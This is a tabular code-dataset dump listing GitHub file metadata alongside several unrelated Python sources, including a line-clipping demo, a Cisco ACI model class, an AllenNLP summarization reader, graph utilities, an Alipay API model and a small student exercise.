blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f3cd108c4ee31b5498859b931cd6bc67e4d4b418 | e91f477713556f14b288b89ecce89754d4bd93f7 | /alpha-clipping/main.py | 8206fd8738006ed2f687e69b36b9dbbd85e3e019 | [
"MIT"
] | permissive | PepSalehi/algorithms | 715603ad16c320c0f1d32c544062b71b11814263 | 1c20f57185e6324aa840ccff98e69764b4213131 | refs/heads/master | 2020-12-28T23:24:39.542742 | 2019-02-01T05:17:56 | 2019-02-01T05:17:56 | 14,173,271 | 0 | 0 | MIT | 2019-02-01T05:17:57 | 2013-11-06T13:27:34 | Python | UTF-8 | Python | false | false | 5,195 | py | #!/usr/bin/env python
"""Example of the alpha clipping algorithm."""
def main():
"""Test some simple examples."""
pl = Point(0.0, 0.0)
pr = Point(10.0, 6.0)
p0 = Point(-3.0, 4.0)
p1 = Point(6.0, -2.0)
p3 = Point(-1.0, -1.0)
p4 = Point(4.0, 4.0)
p5 = Point(1.0, 100.0)
rectangle = Rectangle(pl, pr)
print(alpha_clipping(rectangle, Line(p1, pr)))
print(alpha_clipping(rectangle, Line(p3, pr)))
print(alpha_clipping(rectangle, Line(p3, p4)))
print(alpha_clipping(rectangle, Line(p1, p3)))
print(alpha_clipping(rectangle, Line(p3, p5)))
print(alpha_clipping(rectangle, Line(p0, p1)))
class Point(object):
"""A point identified by (x,y) coordinates."""
def __init__(self, x=0.0, y=0.0):
"""
Constructor for a point.
Parameters
----------
x : float
y : float
"""
assert isinstance(x, float), "x=%r is not a float" % x
assert isinstance(y, float), "y=%r is not a float" % y
self.x = x
self.y = y
def __str__(self):
return "P(%0.2f, %0.2f)" % (self.x, self.y)
def __repr__(self):
return str(self)
def __add__(self, other):
return Point(self.x + other.x, self.y + other.y)
def __sub__(self, other):
return Point(self.x - other.x, self.y - other.y)
def __rmul__(self, other): # :-/
assert isinstance(other, float), "other=%r is not a float" % other
return Point(other * self.x, other * self.y)
class Rectangle(object):
"""A rectangle identified by two points."""
def __init__(self, p1, p2):
"""
Constructor for a rectangle.
Parameters
----------
p1 : Point
p2 : Point
"""
assert isinstance(p1, Point), "p1=%r is not a point" % p1
assert isinstance(p2, Point), "p2=%r is not a point" % p2
self.p1 = p1
self.p2 = p2
self.x_min = min(p1.x, p2.x)
self.y_min = min(p1.y, p2.x)
self.x_max = max(p1.x, p2.x)
self.y_max = max(p1.y, p2.x)
def get_outcode(self, p):
"""
Get the outcode for a point p.
The values are (left, right, bottom, top).
Parameters
----------
p : Point
Returns
-------
list of 4 bools
"""
assert isinstance(p, Point), "p=%r is not a point" % p
outcode = [p.x < self.x_min,
p.x > self.x_max,
p.y < self.y_min,
p.y > self.y_max]
return outcode
def get_wec(self, e, p):
"""
Get the window edge coordiantes (WEC) of a point p according to edge e.
Parameters
----------
e : 0, 1, 2, 3
p : Point
Returns
-------
float
"""
assert e in [0, 1, 2, 3], "e=%s is not in [0, 1, 2, 3]" % str(e)
assert isinstance(p, Point), "p=%r is not a point" % p
if e == 0: # left
return p.x - self.x_min
elif e == 1: # right
return self.x_max - p.x
elif e == 2: # bottom
return p.y - self.y_min
elif e == 3: # top
return self.y_max - p.y
class Line(object):
"""A line identified by two points."""
def __init__(self, p1, p2):
"""
Constructor for a line.
Parameters
----------
p1 : Point
p2 : Point
"""
assert isinstance(p1, Point), "p1=%r is not a point" % p1
assert isinstance(p2, Point), "p2=%r is not a point" % p2
self.p1 = p1
self.p2 = p2
def __str__(self):
return "[%s, %s]" % (str(self.p1), str(self.p2))
def __repr__(self):
return str(self)
def alpha_clipping(rectangle, line):
"""
Apply alpha-clipping of `line` according to `rectangle`.
Parameters
----------
rectangle : Rectangle
line : Line
Returns
-------
`None` or Line within rectangle
"""
a_min = 0.0
a_max = 1.0
outcode_p1 = rectangle.get_outcode(line.p1)
outcode_p2 = rectangle.get_outcode(line.p2)
for e in range(4):
if outcode_p1[e] and outcode_p2[e]:
return None # trivial reject
if outcode_p1[e] or outcode_p2[e]:
# line intersects line
wec_p1 = rectangle.get_wec(e, line.p1)
wec_p2 = rectangle.get_wec(e, line.p2)
a_s = wec_p1 / (wec_p1 - wec_p2)
if outcode_p1[e]: # P1 is outside of the rectangle
a_min = max(a_min, a_s)
else:
a_max = min(a_max, a_s)
if a_min > a_max:
return None # non-trivial reject
else:
# Now we have a line which is parametrized like this:
# P1 + a * (P2 - P1) with a in [a_min, a_max]
# We want a line which is parametrized like this:
# P1' + a * (P2' - P1') with a in [0, 1]
print("a_min=%0.2f" % a_min)
print("a_max=%0.2f" % a_max)
p1s = line.p1 + a_min * (line.p2 - line.p1)
p2s = line.p1 + a_max * (line.p2 - line.p1)
return Line(p1s, p2s)
if __name__ == '__main__':
main()
| [
"info@martin-thoma.de"
] | info@martin-thoma.de |
bda61239f575bbe29c60da4f3ed441365a6650ae | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/ep/ipagingp.py | 24fe0ca702d011aa284b1fef708a92a52ea68b21 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,228 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class IpAgingP(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = ClassMeta("cobra.model.ep.IpAgingP")
meta.moClassName = "epIpAgingP"
meta.rnFormat = "ipAgingP-%(name)s"
meta.category = MoCategory.REGULAR
meta.label = "IP Aging Policy"
meta.writeAccessMask = 0x101000000001
meta.readAccessMask = 0x101000000001
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.tag.Tag")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childClasses.add("cobra.model.aaa.RbacAnnotation")
meta.childClasses.add("cobra.model.tag.Annotation")
meta.childNamesAndRnPrefix.append(("cobra.model.tag.Annotation", "annotationKey-"))
meta.childNamesAndRnPrefix.append(("cobra.model.aaa.RbacAnnotation", "rbacDom-"))
meta.childNamesAndRnPrefix.append(("cobra.model.tag.Tag", "tagKey-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.infra.Infra")
meta.superClasses.add("cobra.model.fabric.ProtoPol")
meta.superClasses.add("cobra.model.fabric.ProtoInstPol")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.fabric.L2InstPol")
meta.rnPrefixes = [
('ipAgingP-', True),
]
prop = PropMeta("str", "adminSt", "adminSt", 27969, PropCategory.REGULAR)
prop.label = "Admin State"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 2
prop.defaultValueStr = "disabled"
prop._addConstant("disabled", "disabled", 2)
prop._addConstant("enabled", "enabled", 1)
meta.props.add("adminSt", prop)
prop = PropMeta("str", "annotation", "annotation", 38574, PropCategory.REGULAR)
prop.label = "Annotation. Suggested format orchestrator:value"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("annotation", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "extMngdBy", "extMngdBy", 40713, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "undefined"
prop._addConstant("msc", "msc", 1)
prop._addConstant("undefined", "undefined", 0)
meta.props.add("extMngdBy", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 27970, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
prop.range = [(1, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "uid", "uid", 8, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("uid", prop)
meta.namingProps.append(getattr(meta.props, "name"))
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Policy"
def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
namingVals = [name]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
f4715eb58fdf816dd11aecfe15e38cb0f67c343e | f2ed44ff6a8e4f163680f53bd34845e3cac3d91c | /summarize/data/dataset_readers/sds/abstractive.py | 017d53831a96c5b3503813c07cadd9b1ba44f658 | [
"Apache-2.0"
] | permissive | CogComp/summary-cloze | 1a2b76ba2e19a8ca0a98e1b95e036dc1dfba17ad | b38e3e8c7755903477fd92a4cff27125cbf5553d | refs/heads/master | 2020-09-01T17:09:10.312107 | 2019-11-05T20:43:47 | 2019-11-05T20:43:47 | 219,012,685 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,880 | py | from allennlp.common.file_utils import cached_path
from allennlp.data import DatasetReader, Instance
from allennlp.data.fields import MetadataField, TextField
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer
from overrides import overrides
from typing import Dict, Iterable, List, Optional
from summarize.data.io import JsonlReader
from summarize.data.paragraph_tokenizers import ParagraphTokenizer, ParagraphWordTokenizer
@DatasetReader.register('sds-abstractive')
class AbstractiveDatasetReader(DatasetReader):
"""
Reads a generic single-document summarization dataset for an abstractive
summarization model. Both the document and the summary is expected to be a
list of sentences of type ``List[str]`` in "document" and "summary" field names.
Parameters
----------
document_token_indexers: ``Dict[str, TokenIndexer]``, optional (default = ``{'tokens': SingleIdTokenIndexer()}``).
The token indexers used for the document tokens.
summary_token_indexers: ``Dict[str, TokenIndexer]``, optional.
The token indexers used for the summary tokens. If not provided, the default value
is set to be the same object as ``document_token_indexers``.
document_tokenizer: ``ParagraphTokenizer``, optional (default = ``ParagraphWordTokenizer``).
The tokenizer for the document text.
summary_tokenizer: ``ParagraphTokenizer``, optional.
The tokenizer for the summary text. If not provided, the default value is set
to be ``document_tokenizer``.
max_document_length: ``int``, optional (default = ``None``).
The maximum number of document tokens to use. If ``None``, no truncation is performed. The
truncation runs after the tokenization step, so this length number includes any ``start_tokens``,
``end_tokens``, etc. It does not ensure that the ``end_tokens`` will still be at the end
of the sequence.
max_summary_length: ``int``, optional (default = ``None``).
The maximum number of summary tokens to use. See ``max_document_length`` for more details.
"""
def __init__(self,
document_token_indexers: Optional[Dict[str, TokenIndexer]] = None,
summary_token_indexers: Optional[Dict[str, TokenIndexer]] = None,
document_tokenizer: Optional[ParagraphTokenizer] = None,
summary_tokenizer: Optional[ParagraphTokenizer] = None,
max_document_length: Optional[int] = None,
max_summary_length: Optional[int] = None,
lazy: bool = True) -> None:
super().__init__(lazy)
self.document_token_indexers = document_token_indexers or {'tokens': SingleIdTokenIndexer()}
self.summary_token_indexers = summary_token_indexers or self.document_token_indexers
self.document_tokenizer = document_tokenizer or ParagraphWordTokenizer()
self.summary_tokenizer = summary_tokenizer or self.document_tokenizer
self.max_document_length = max_document_length
self.max_summary_length = max_summary_length
@overrides
def _read(self, file_path: str) -> Iterable[Instance]:
file_path = cached_path(file_path)
with JsonlReader(file_path) as f:
for data in f:
document = data['document']
summary = data['summary']
yield self.text_to_instance(document, summary=summary)
@overrides
def text_to_instance(self, document: List[str], summary: Optional[List[str]] = None) -> Instance:
"""
Parameters
----------
document: ``List[str]``, required.
The list of document sentences.
summary: ``List[str]``, optional.
The list of summary sentences.
"""
fields = {}
# Setup the document field
tokenized_document = self.document_tokenizer.tokenize(document)
if self.max_document_length is not None:
tokenized_document = tokenized_document[:self.max_document_length]
document_field = TextField(tokenized_document, self.document_token_indexers)
fields['document'] = document_field
# Setup the summary field, if it exists
if summary is not None:
tokenized_summary = self.summary_tokenizer.tokenize(summary)
if self.max_summary_length is not None:
tokenized_summary = tokenized_summary[:self.max_summary_length]
summary_field = TextField(tokenized_summary, self.summary_token_indexers)
fields['summary'] = summary_field
# Pass the original data through as metadata
metadata = {}
metadata['document'] = document
if summary is not None:
metadata['summary'] = summary
fields['metadata'] = MetadataField(metadata)
return Instance(fields)
| [
"danfdeutsch@gmail.com"
] | danfdeutsch@gmail.com |
2568d6aa8b661c8dae6a0f85ab197fa18cd31c95 | 7f66c9818b2a22e6dbfa832a6bb4f9f21fbd15da | /semester_2/graph/lab_03/main.py | 5147ef29678cf898ae10c2835d540e0b4f05cb83 | [] | no_license | caprapaul/assignments | cc3992833d4f23f74286c1800ac38dc2d9a874da | 206b049700d8a3e03b52e57960cd44f85c415fe8 | refs/heads/master | 2023-05-24T03:46:42.858147 | 2022-05-03T16:26:58 | 2022-05-03T16:26:58 | 248,552,522 | 0 | 0 | null | 2023-05-09T01:49:04 | 2020-03-19T16:31:37 | C | UTF-8 | Python | false | false | 1,744 | py | import random
from directed_graph import DirectedGraph
from ui import UI
from service import Service
def random_graph(graph, vertex_count, edge_count):
current_edge_count = 0
for i in range(vertex_count):
graph.add_vertex(i)
while current_edge_count < edge_count:
from_vertex = random.randrange(0, vertex_count)
to_vertex = random.randrange(0, vertex_count)
cost = random.randrange(-10, 10)
if graph.get_edge(from_vertex, to_vertex) is None:
graph.add_edge(from_vertex, to_vertex, cost)
current_edge_count += 1
def load_from_file(graph, file_name: str):
with open(file_name, 'r') as data_file:
first_line = data_file.readline()
(vertex_count, edge_count) = first_line.split(' ')
vertex_count = int(vertex_count)
edge_count = int(edge_count)
for i in range(vertex_count):
graph.add_vertex(i)
for line in data_file:
(edge_start, edge_end, edge_cost) = line.split(' ')
edge_start = int(edge_start)
edge_end = int(edge_end)
edge_cost = int(edge_cost)
graph.add_edge(edge_start, edge_end, edge_cost)
def save_to_file(graph: DirectedGraph, file_name: str):
with open(file_name, 'w') as data_file:
output = f"{graph.vertices_count} {graph.edges_count}\n"
for edge in graph.parse_edges():
output += f"{edge.start} {edge.end} {edge.cost}\n"
data_file.write(output)
def run():
graph = DirectedGraph()
#random_graph(graph, 100, 10)
load_from_file(graph, "graph5.txt")
service = Service(graph)
ui = UI(graph, service)
ui.run()
save_to_file(graph, "graph_out.txt")
run()
| [
"c.paulica@gmail.com"
] | c.paulica@gmail.com |
c9c8afe833e1dc94693f45f0a75d7f2677ea1bf0 | aa73e301f658b45a9674df4b619b288945dd0669 | /branches/sal4_new_test_framework/examples/lts2graph.py | a0436c68a964f4d2e7727d7f517de6f605cb99bb | [
"MIT"
] | permissive | svn2github/python-graph2 | e1c37f77cc0a27ac9099208876c63693bffbc929 | f19039d7f3fc1f04977c3f1d1d6128e8545ebef1 | refs/heads/master | 2020-04-30T04:11:38.475209 | 2013-04-19T01:06:14 | 2013-04-19T01:06:14 | 9,714,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,623 | py | #!/usr/bin/env python
# Copyright (c) Pedro Matiello <pmatiello@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
This small application will build and draw a graph for a given finite definite automaton described
as a labelled transition system.
This is a very naive, probably useless, possibly incorrect, barely tested implementation. No
validation is ever performed. Take care or it will burn your house and kill your cat.
"""
# Module metadata
__authors__ = "Pedro Matiello"
__license__ = "MIT"
# Imports
import sys
sys.path.append('..')
import pygraph
sys.path.append('/usr/lib/graphviz/python/')
sys.path.append('/usr/lib64/graphviz/python/')
import gv
def load_automaton(filename):
"""
Read a automaton described as a labelled transition system and build the equivalent graph.
@type filename: string
@param filename: Name of the file containing the LTS-described automaton.
@rtype: graph
@return: Automaton's graph.
"""
gr = pygraph.digraph()
infile = file(filename,'r')
line = infile.readline()
final = []
while (line):
line = line.replace("\n",'').split(' ')
datatype = line[0]
data = line[1:]
if (datatype == 'Q'):
# States
for each in data:
gr.add_node(each)
if (datatype == 'A'):
# Alphabet
pass
if (datatype == 'F'):
# Final states
final = final + data
if (datatype == 's'):
# Initial state
gr.add_node('.',attrs=[('shape','point')])
gr.add_edge('.',data[0])
if (datatype == 't'):
# Transitions
if (gr.has_edge(data[1], data[2])):
gr.set_edge_label(data[1], data[2], \
gr.edge_label(data[1], data[2]) + ', ' + data[0])
else:
gr.add_edge(data[1], data[2], label=data[0])
line = infile.readline()
for node in gr:
if (node in final and node != '.'):
gr.add_node_attribute(node, ('shape','doublecircle'))
elif (node != '.'):
gr.add_node_attribute(node, ('shape','circle'))
return gr, final
# Main
try:
filename = sys.argv[1]
gr, final = load_automaton(sys.argv[1])
dot = gr.write(fmt='dot')
except IndexError:
print "Syntax: %s filename" % sys.argv[0]
sys.exit(1)
except IOError:
print "Can't open file %s" % filename
sys.exit(2)
# Print graph as PNG image
gvv = gv.readstring(dot)
gv.layout(gvv,'circo')
gv.render(gvv,'png',filename + '.png')
| [
"salimfadhley@70df0079-b534-0410-988b-a5721c0f2d16"
] | salimfadhley@70df0079-b534-0410-988b-a5721c0f2d16 |
037de8db65e09ddb945a0032a8f52a6e11056bfc | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOpenBpaasContractQueryModel.py | aafa6e6f87c71ca0f87f9405737db7a130bcbd87 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,452 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenBpaasContractQueryModel(object):
def __init__(self):
self._bpaas_app_id = None
self._service_id = None
@property
def bpaas_app_id(self):
return self._bpaas_app_id
@bpaas_app_id.setter
def bpaas_app_id(self, value):
self._bpaas_app_id = value
@property
def service_id(self):
return self._service_id
@service_id.setter
def service_id(self, value):
self._service_id = value
def to_alipay_dict(self):
params = dict()
if self.bpaas_app_id:
if hasattr(self.bpaas_app_id, 'to_alipay_dict'):
params['bpaas_app_id'] = self.bpaas_app_id.to_alipay_dict()
else:
params['bpaas_app_id'] = self.bpaas_app_id
if self.service_id:
if hasattr(self.service_id, 'to_alipay_dict'):
params['service_id'] = self.service_id.to_alipay_dict()
else:
params['service_id'] = self.service_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenBpaasContractQueryModel()
if 'bpaas_app_id' in d:
o.bpaas_app_id = d['bpaas_app_id']
if 'service_id' in d:
o.service_id = d['service_id']
return o
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
c4e8e69cf70a352f0113b54e9d57008ae864bf9b | 1d892928c70ee9ddf66f2a37a8e083d2632c6e38 | /smoketests/__init__.py | dbc926f1e38eba7021e4aac46cf302bf4a47fb84 | [
"Apache-2.0"
] | permissive | usc-isi/essex-baremetal-support | 74196c3f1332ee3cdeba9c263faff0ac0567d3cf | a77daf8ef56cf41e38de36621eda25ed3f180156 | refs/heads/master | 2021-05-19T03:12:11.929550 | 2020-07-24T14:15:26 | 2020-07-24T14:15:26 | 4,702,421 | 0 | 1 | Apache-2.0 | 2020-07-24T14:15:27 | 2012-06-18T15:19:41 | null | UTF-8 | Python | false | false | 1,262 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`smoketests` -- Nova Integration "Smoke" Tests
=====================================================
.. automodule:: nova.volume
:platform: Unix
.. moduleauthor:: Jesse Andrews <jesse@ansolabs.com>
.. moduleauthor:: Devin Carlen <devin.carlen@gmail.com>
.. moduleauthor:: Vishvananda Ishaya <vishvananda@yahoo.com>
.. moduleauthor:: Joshua McKenty <joshua@cognition.ca>
.. moduleauthor:: Manish Singh <yosh@gimp.org>
.. moduleauthor:: Andy Smith <andy@anarkystic.com>
"""
| [
"dkang@isi.edu"
] | dkang@isi.edu |
53a41e841c6260418bd1e7ae9a20c99f0b338dbc | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/578164_Find_line_text_another/recipe-578164.py | fb286a488650b18fb2f8b998295941577af9201d | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 975 | py | import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("file1", help="First file whose lines you want to check")
parser.add_argument("file2", help="Second file, in which you want to search for lines from first file")
args = parser.parse_args()
file1 = open(args.file1)
file2 = open(args.file2)
print "Comparing:"
print args.file1
print "and"
print args.file2
print ""
print "Attempting to find lines in *file1* that are missing in *file2*"
print ""
file1array = file1.readlines()
file2a = file2.readlines()
lengthfile1array = len(file1array)
j=0;
for file1item in file1array:
j += 1
sys.stdout.write("Checking line#: %d/" %(j))
sys.stdout.write("%d \r" %(lengthfile1array))
i=0;
for file2item in file2a:
if file1item.rstrip() == file2item.rstrip():
i += 1
break
else:
i += 1
if i == len(file2a):
print "MISSING LINE FOUND at Line# " + str(j)
| [
"betty@qburst.com"
] | betty@qburst.com |
23dedd75381b9f1fe064efe634f7f8771b9ed2c0 | 565ae8473c545c43341f5511b9633e97f0e4da8b | /course2_python_fundamentals/10-Exams/1-MID-EXAM/PREPARATION/other-exams-for-exam-preparation/Mid_Exam_10_dec_2019/_2_Archery_Tournament.py | c801675c69580bc08321f897a5c16914079ec32a | [] | no_license | andriiburka/Web-Development-with-Python | 3934c1a3945bd983ab39d38b97f1af16fe784207 | b6927653a2c6a9cc10a8768395233e347624c49a | refs/heads/master | 2022-11-21T21:42:04.898254 | 2020-07-29T22:59:56 | 2020-07-29T22:59:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | integers = list(map(int, input().split('|')))
second_integers = []
while True:
judge_command = list(map(str, input().split('@')))
if judge_command[0] == 'Game over':
break
else:
index = int(judge_command[1])
length = int(judge_command[2])
if judge_command[0] == 'Shoot Left':
action = index - length
a = integers.pop(action)
integers.insert(action + 1, abs(a - 5))
elif judge_command[0] == 'Shoot Right'
if index + 1 == length:
action = index + length
for i in range(index + 1):
if integers[i] == length:
index = 0 + length
b = integers.pop(index - 1)
integers.insert(index, index - 5)
print(integers)
| [
"andriiburka@gmail.com"
] | andriiburka@gmail.com |
7c5d43f43b42b60f2b4114b30bbe086c274ce47d | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/messenger/proto/shared_errors.py | 967a966ccf6f0da8b65759b6db45d2cedde60407 | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,826 | py | # 2015.11.10 21:30:27 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/proto/shared_errors.py
import BigWorld
from gui.Scaleform.locale.MESSENGER import MESSENGER as I18N_MESSENGER
from helpers import i18n
